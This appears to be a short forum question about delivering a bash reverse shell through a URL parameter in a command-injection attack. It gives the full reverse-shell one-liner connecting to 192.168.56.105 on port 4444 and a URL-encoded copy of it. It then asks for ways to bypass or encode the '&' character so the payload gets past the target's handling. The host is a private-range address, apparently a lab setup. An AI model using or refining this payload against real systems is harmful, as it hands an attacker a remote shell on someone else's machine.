# Bash reverse shell as a URL parameter value

Tags: encoding, bash, reverse-shell

I try to put bash reverse shell as a URL parameter. The command is as follows:

```
bash -i >& /dev/tcp/192.168.56.105/4444 0>&1
```

I have encoded the above code with URL encoding

```
bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.105%2F4444%200%3E%261
```

But still, the problem is in interpreting the "&" character. Do you have any other tips on how to bypass/encode "&" char and use a bash reverse shell?